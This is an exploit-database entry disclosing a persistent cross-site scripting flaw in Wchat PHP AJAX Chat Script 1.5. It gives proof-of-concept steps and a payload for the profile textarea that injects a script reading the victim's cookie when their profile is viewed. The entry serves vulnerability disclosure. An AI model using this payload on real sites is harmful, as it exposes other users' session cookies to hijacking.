Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting

2018-05-21T00:00:00
ID EXPLOITPACK:B06732F503CF102DC59741F2963D9F6C
Type exploitpack
Reporter L0RD
Modified 2018-05-21T00:00:00

Description

Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting

                                        
                                            # Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script  1.5 - Persistent cross site scripting
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327
# Version: 1.5
# Tested on: Windows

# POC :
1) Create your account and navigate to "Edit profile"
2) Put this payload into textarea :
</textarea><script>console.log(document.cookie)</script>
3) The payload will be executed if someone opens your profile .